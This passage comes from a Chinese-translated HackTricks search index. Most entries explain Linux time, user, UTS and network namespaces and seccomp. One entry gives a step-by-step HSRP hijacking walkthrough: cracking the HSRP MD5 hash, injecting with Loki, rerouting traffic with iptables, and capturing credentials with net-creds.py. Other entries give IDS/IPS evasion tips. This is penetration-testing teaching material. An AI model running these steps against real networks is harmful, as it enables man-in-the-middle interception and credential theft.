PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash\\n# Run ifconfig or ip -a","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 创建不同的命名空间","id":"1714","title":"创建不同的命名空间"},"1715":{"body":"bash ls -l /proc/self/ns/net\\nlrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/net -> \'net:[4026531840]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 检查您的进程所在的命名空间","id":"1715","title":"检查您的进程所在的命名空间"},"1716":{"body":"bash sudo find /proc -maxdepth 3 -type l -name net -exec readlink {} \\\\; 2>/dev/null | sort -u | grep \\"net:\\"\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name net -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 查找所有网络命名空间","id":"1716","title":"查找所有网络命名空间"},"1717":{"body":"bash nsenter -n TARGET_PID --pid /bin/bash 您只能 以 root 身份进入另一个进程命名空间 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/net)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » 进入网络命名空间","id":"1717","title":"进入网络命名空间"},"1718":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network Namespace » References","id":"1718","title":"References"},"1719":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 时间命名空间","id":"1719","title":"时间命名空间"},"172":{"body":"HSRP(热备份路由器/冗余协议)概述 HSRP 是一种思科专有协议,旨在实现网络网关冗余。它允许将多个物理路由器配置为一个共享 IP 地址的单一逻辑单元。该逻辑单元由一个主要路由器管理,负责流量的引导。与使用优先级和权重进行负载均衡的 GLBP 不同,HSRP 依赖于单个活动路由器进行流量管理。 HSRP 中的角色和术语 HSRP 活动路由器 :作为网关的设备,管理流量流动。 HSRP 备用路由器 :准备接管活动路由器故障时的备份路由器。 HSRP 组 :一组路由器协作形成一个单一的弹性虚拟路由器。 HSRP MAC 地址 :在 HSRP 设置中分配给逻辑路由器的虚拟 MAC 地址。 HSRP 虚拟 IP 地址 :HSRP 组的虚拟 IP 地址,作为连接设备的默认网关。 HSRP 版本 HSRP 有两个版本,HSRPv1 和 HSRPv2,主要在组容量、多播 IP 使用和虚拟 MAC 地址结构上有所不同。该协议利用特定的多播 IP 地址进行服务信息交换,每 3 秒发送一次 Hello 数据包。如果在 10 秒内未收到数据包,则假定路由器处于非活动状态。 HSRP 攻击机制 HSRP 攻击涉及通过注入最大优先级值强行接管活动路由器的角色。这可能导致中间人(MITM)攻击。攻击前的基本步骤包括收集有关 HSRP 设置的数据,可以使用 Wireshark 进行流量分析。 绕过 HSRP 身份验证的步骤 将包含 HSRP 数据的网络流量保存为 .pcap 文件。 shell tcpdump -w hsrp_traffic.pcap 使用 hsrp2john.py 从 .pcap 文件中提取 MD5 哈希。 shell python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes 使用 John the Ripper 破解 MD5 哈希。 shell john --wordlist=mywordlist.txt hsrp_hashes 使用 Loki 执行 HSRP 注入 启动 Loki 以识别 HSRP 广告。 将网络接口设置为混杂模式并启用 IP 转发。 shell sudo ip link set eth0 promisc on\\nsudo sysctl -w net.ipv4.ip_forward=1 使用 Loki 针对特定路由器,输入破解的 HSRP 密码,并执行必要的配置以冒充活动路由器。 在获得活动路由器角色后,配置您的网络接口和 IP 表以拦截合法流量。 shell sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0\\nsudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 修改路由表以通过前活动路由器路由流量。 shell sudo route del default\\nsudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 使用 net-creds.py 或类似工具从拦截的流量中捕获凭据。 shell sudo python2 net-creds.py -i eth0 执行这些步骤使攻击者能够拦截和操纵流量,类似于 GLBP 劫持的过程。这突显了 HSRP 等冗余协议的脆弱性以及对强大安全措施的需求。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » HSRP 劫持的被动解释与命令细节","id":"172","title":"HSRP 劫持的被动解释与命令细节"},"1720":{"body":"Linux中的时间命名空间允许对系统单调时钟和启动时间时钟进行每个命名空间的偏移。它通常在Linux容器中使用,以更改容器内的日期/时间,并在从检查点或快照恢复后调整时钟。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 基本信息","id":"1720","title":"基本信息"},"1721":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 实验:","id":"1721","title":"实验:"},"1722":{"body":"CLI bash sudo unshare -T [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题说明 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 创建不同的命名空间","id":"1722","title":"创建不同的命名空间"},"1723":{"body":"bash ls -l /proc/self/ns/time\\nlrwxrwxrwx 1 root root 0 Apr 4 21:16 /proc/self/ns/time -> \'time:[4026531834]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 检查您的进程所在的命名空间","id":"1723","title":"检查您的进程所在的命名空间"},"1724":{"body":"bash sudo find /proc -maxdepth 3 -type l -name time -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name time -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 查找所有时间命名空间","id":"1724","title":"查找所有时间命名空间"},"1725":{"body":"bash nsenter -T TARGET_PID --pid /bin/bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 进入时间命名空间","id":"1725","title":"进入时间命名空间"},"1726":{"body":"从 Linux 5.6 开始,每个时间命名空间可以虚拟化两个时钟: CLOCK_MONOTONIC CLOCK_BOOTTIME 它们的每个命名空间的增量通过文件 /proc//timens_offsets 暴露(并可以被修改): $ sudo unshare -Tr --mount-proc bash # -T creates a new timens, -r drops capabilities\\n$ cat /proc/$$/timens_offsets\\nmonotonic 0\\nboottime 0 该文件包含两行 - 每个时钟一行 - 以 纳秒 为单位的偏移量。持有 CAP_SYS_TIME _在时间命名空间_中的进程可以更改该值: # advance CLOCK_MONOTONIC by two days (172 800 s)\\necho \\"monotonic 172800000000000\\" > /proc/$$/timens_offsets\\n# verify\\n$ cat /proc/$$/uptime # first column uses CLOCK_MONOTONIC\\n172801.37 13.57 如果您需要墙上时钟(CLOCK_REALTIME)也发生变化,您仍然必须依赖经典机制(date、hwclock、chronyd等);它 不是 命名空间化的。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 操作时间偏移","id":"1726","title":"操作时间偏移"},"1727":{"body":"sudo unshare -T \\\\\\n--monotonic=\\"+24h\\" \\\\\\n--boottime=\\"+7d\\" \\\\\\n--mount-proc \\\\\\nbash 长选项会在命名空间创建后自动将所选的增量写入 timens_offsets,省去了手动 echo 的步骤。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » unshare(1) 辅助标志 (util-linux ≥ 2.38)","id":"1727","title":"unshare(1) 辅助标志 (util-linux ≥ 2.38)"},"1728":{"body":"OCI Runtime Specification v1.1 (2023年11月)增加了专用的 time 命名空间类型和 linux.timeOffsets 字段,以便容器引擎可以以可移植的方式请求时间虚拟化。 runc >= 1.2.0 实现了该规范的这一部分。一个最小的 config.json 片段如下所示: json {\\n\\"linux\\": {\\n\\"namespaces\\": [\\n{\\"type\\": \\"time\\"}\\n],\\n\\"timeOffsets\\": {\\n\\"monotonic\\": 86400,\\n\\"boottime\\": 600\\n}\\n}\\n} 然后使用 runc run 运行容器。 注意:runc 1.2.6 (2025年2月)修复了一个“使用私有 timens 执行到容器中”的错误,该错误可能导致挂起和潜在的拒绝服务。确保在生产环境中使用 ≥ 1.2.6。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » OCI 和运行时支持","id":"1728","title":"OCI 和运行时支持"},"1729":{"body":"所需能力 – 进程需要在其用户/时间命名空间内具有 CAP_SYS_TIME 才能更改偏移量。在容器中删除该能力(Docker 和 Kubernetes 的默认设置)可以防止篡改。 无墙钟时间更改 – 由于 CLOCK_REALTIME 与主机共享,攻击者无法仅通过 timens 来伪造证书生命周期、JWT 过期等。 日志/检测规避 – 依赖于 CLOCK_MONOTONIC 的软件(例如基于正常运行时间的速率限制器)如果命名空间用户调整偏移量可能会感到困惑。对于安全相关的时间戳,优先使用 CLOCK_REALTIME。 内核攻击面 – 即使删除了 CAP_SYS_TIME,内核代码仍然可访问;保持主机补丁更新。Linux 5.6 → 5.12 收到了多个 timens 的错误修复(NULL-deref,符号问题)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 安全考虑","id":"1729","title":"安全考虑"},"173":{"body":"https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » 参考文献","id":"173","title":"参考文献"},"1730":{"body":"在容器运行时默认配置中删除 CAP_SYS_TIME。 保持运行时更新(runc ≥ 1.2.6,crun ≥ 1.12)。 如果依赖于 --monotonic/--boottime 辅助工具,请固定 util-linux ≥ 2.38。 审计读取 uptime 或 CLOCK_MONOTONIC 的容器内软件,以确保安全关键逻辑。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 加固检查清单","id":"1730","title":"加固检查清单"},"1731":{"body":"man7.org – 时间命名空间手册页: https://man7.org/linux/man-pages/man7/time_namespaces.7.html OCI 博客 – “OCI v1.1:新的时间和 RDT 命名空间”(2023年11月15日): https://opencontainers.org/blog/2023/11/15/oci-spec-v1.1 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace » 参考文献","id":"1731","title":"参考文献"},"1732":{"body":"Reading time: 11 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 用户命名空间","id":"1732","title":"用户命名空间"},"1733":{"body":"用户命名空间是一个 Linux 内核特性, 提供用户和组 ID 映射的隔离 ,允许每个用户命名空间拥有 自己的一组用户和组 ID 。这种隔离使得在不同用户命名空间中运行的进程 可以拥有不同的权限和所有权 ,即使它们在数值上共享相同的用户和组 ID。 用户命名空间在容器化中特别有用,每个容器应该拥有自己独立的用户和组 ID 集,从而在容器与主机系统之间提供更好的安全性和隔离。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 基本信息","id":"1733","title":"基本信息"},"1734":{"body":"当创建一个新的用户命名空间时,它 以一个空的用户和组 ID 映射集开始 。这意味着在新的用户命名空间中运行的任何进程 最初在命名空间外没有权限 。 可以在新命名空间中的用户和组 ID 与父(或主机)命名空间中的 ID 之间建立 ID 映射。这 允许新命名空间中的进程拥有与父命名空间中的用户和组 ID 对应的权限和所有权 。然而,ID 映射可以限制在特定范围和 ID 子集上,从而对新命名空间中进程授予的权限进行细粒度控制。 在用户命名空间内, 进程可以在命名空间内拥有完全的 root 权限(UID 0) ,同时在命名空间外仍然拥有有限的权限。这允许 容器在其自己的命名空间内以类似 root 的能力运行,而不在主机系统上拥有完全的 root 权限 。 进程可以使用 setns() 系统调用在命名空间之间移动,或使用带有 CLONE_NEWUSER 标志的 unshare() 或 clone() 系统调用创建新的命名空间。当进程移动到新命名空间或创建一个新命名空间时,它将开始使用与该命名空间关联的用户和组 ID 映射。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 工作原理:","id":"1734","title":"工作原理:"},"1735":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 实验:","id":"1735","title":"实验:"},"1736":{"body":"CLI bash sudo unshare -U [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 的过早退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行,而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash 要使用用户命名空间,Docker 守护进程需要使用 --userns-remap=default 启动(在 Ubuntu 14.04 中,可以通过修改 /etc/default/docker 然后执行 sudo service docker restart 来完成)","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 创建不同的命名空间","id":"1736","title":"创建不同的命名空间"},"1737":{"body":"bash ls -l /proc/self/ns/user\\nlrwxrwxrwx 1 root root 0 Apr 4 20:57 /proc/self/ns/user -> \'user:[4026531837]\' 可以通过以下命令检查 Docker 容器中的用户映射: bash cat /proc/self/uid_map\\n0 0 4294967295 --> Root is root in host\\n0 231072 65536 --> Root is 231072 userid in host 或从主机使用: bash cat /proc//uid_map","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 检查您的进程在哪个命名空间中","id":"1737","title":"检查您的进程在哪个命名空间中"},"1738":{"body":"bash sudo find /proc -maxdepth 3 -type l -name user -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name user -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 查找所有用户命名空间","id":"1738","title":"查找所有用户命名空间"},"1739":{"body":"bash nsenter -U TARGET_PID --pid /bin/bash 此外,您只能 以 root 身份进入另一个进程命名空间 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/user)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 进入用户命名空间","id":"1739","title":"进入用户命名空间"},"174":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 发送一些 TTL 足够到达 IDS/IPS 但不足以到达最终系统的数据包。然后,发送另一组与之前相同序列的数据包,以便 IPS/IDS 会认为它们是重复的而不会检查,但实际上它们携带了恶意内容。 Nmap 选项: --ttlvalue ","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » TTL 操作","id":"174","title":"TTL 操作"},"1740":{"body":"bash unshare -U [--map-user=|] [--map-group=|] [--map-root-user] [--map-current-user] bash # Container\\nsudo unshare -U /bin/bash\\nnobody@ip-172-31-28-169:/home/ubuntu$ #Check how the user is nobody # From the host\\nps -ef | grep bash # The user inside the host is still root, not nobody\\nroot 27756 27755 0 21:11 pts/10 00:00:00 /bin/bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 创建新的用户命名空间(带映射)","id":"1740","title":"创建新的用户命名空间(带映射)"},"1741":{"body":"在用户命名空间的情况下, 当创建一个新的用户命名空间时,进入该命名空间的进程会被授予该命名空间内的完整能力集 。这些能力允许进程执行特权操作,例如 挂载 文件系统 、创建设备或更改文件的所有权,但 仅在其用户命名空间的上下文中 。 例如,当您在用户命名空间内拥有 CAP_SYS_ADMIN 能力时,您可以执行通常需要此能力的操作,如挂载文件系统,但仅在您的用户命名空间的上下文中。您使用此能力执行的任何操作都不会影响主机系统或其他命名空间。 warning 因此,即使在新的用户命名空间内获取一个新进程 会让您恢复所有能力 (CapEff: 000001ffffffffff),您实际上 只能使用与命名空间相关的能力 (例如挂载),而不是所有能力。因此,仅凭这一点不足以逃离 Docker 容器。 bash # There are the syscalls that are filtered after changing User namespace with:\\nunshare -UmCpf bash Probando: 0x067 . . . Error\\nProbando: 0x070 . . . Error\\nProbando: 0x074 . . . Error\\nProbando: 0x09b . . . Error\\nProbando: 0x0a3 . . . Error\\nProbando: 0x0a4 . . . Error\\nProbando: 0x0a7 . . . Error\\nProbando: 0x0a8 . . . Error\\nProbando: 0x0aa . . . Error\\nProbando: 0x0ab . . . Error\\nProbando: 0x0af . . . Error\\nProbando: 0x0b0 . . . Error\\nProbando: 0x0f6 . . . Error\\nProbando: 0x12c . . . Error\\nProbando: 0x130 . . . Error\\nProbando: 0x139 . . . Error\\nProbando: 0x140 . . . Error\\nProbando: 0x141 . . . Error tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User Namespace » 恢复能力","id":"1741","title":"恢复能力"},"1742":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » UTS Namespace","id":"1742","title":"UTS Namespace"},"1743":{"body":"UTS(UNIX时间共享系统)命名空间是一个Linux内核特性,它提供了两个系统标识符的 隔离 : 主机名 和 NIS (网络信息服务)域名。这种隔离允许每个UTS命名空间拥有 自己的独立主机名和NIS域名 ,这在容器化场景中特别有用,因为每个容器应该看起来像是一个具有自己主机名的独立系统。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 基本信息","id":"1743","title":"基本信息"},"1744":{"body":"当创建一个新的UTS命名空间时,它会从其父命名空间 复制主机名和NIS域名 。这意味着在创建时,新的命名空间 共享与其父命名空间相同的标识符 。然而,在命名空间内对主机名或NIS域名的任何后续更改将不会影响其他命名空间。 UTS命名空间内的进程 可以使用sethostname()和setdomainname()系统调用分别更改主机名和NIS域名 。这些更改是本地的,不会影响其他命名空间或主机系统。 进程可以使用setns()系统调用在命名空间之间移动,或使用带有CLONE_NEWUTS标志的unshare()或clone()系统调用创建新的命名空间。当进程移动到新的命名空间或创建一个时,它将开始使用与该命名空间关联的主机名和NIS域名。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 工作原理:","id":"1744","title":"工作原理:"},"1745":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 实验:","id":"1745","title":"实验:"},"1746":{"body":"CLI bash sudo unshare -u [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题说明 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新的命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 的过早退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行,而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 创建不同的命名空间","id":"1746","title":"创建不同的命名空间"},"1747":{"body":"bash ls -l /proc/self/ns/uts\\nlrwxrwxrwx 1 root root 0 Apr 4 20:49 /proc/self/ns/uts -> \'uts:[4026531838]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 检查您的进程所在的命名空间","id":"1747","title":"检查您的进程所在的命名空间"},"1748":{"body":"bash sudo find /proc -maxdepth 3 -type l -name uts -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name uts -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 查找所有 UTS 命名空间","id":"1748","title":"查找所有 UTS 命名空间"},"1749":{"body":"bash nsenter -u TARGET_PID --pid /bin/bash tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS Namespace » 进入 UTS 命名空间","id":"1749","title":"进入 UTS 命名空间"},"175":{"body":"只需向数据包中添加垃圾数据,以避免 IPS/IDS 签名。 Nmap 选项: --data-length 25","breadcrumbs":"Pentesting Network » IDS and IPS Evasion » 避免签名","id":"175","title":"避免签名"},"1750":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Seccomp » Seccomp","id":"1750","title":"Seccomp"},"1751":{"body":"Seccomp ,即安全计算模式,是 Linux内核的一个安全特性,用于过滤系统调用 。它将进程限制在一组有限的系统调用中(exit()、sigreturn()、read()和write(),仅适用于已打开的文件描述符)。如果进程尝试调用其他任何内容,内核将使用SIGKILL或SIGSYS终止该进程。该机制并不虚拟化资源,而是将进程与资源隔离。 激活seccomp有两种方法:通过prctl(2)系统调用与PR_SET_SECCOMP,或者对于3.17及以上版本的Linux内核,使用seccomp(2)系统调用。通过写入/proc/self/seccomp来启用seccomp的旧方法已被弃用,取而代之的是prctl()。 一个增强功能, seccomp-bpf ,增加了使用可自定义策略过滤系统调用的能力,使用伯克利数据包过滤器(BPF)规则。该扩展被OpenSSH、vsftpd以及Chrome OS和Linux上的Chrome/Chromium浏览器等软件利用,以实现灵活高效的系统调用过滤,提供了对现在不再支持的Linux systrace的替代方案。","breadcrumbs":"Linux Privilege Escalation » 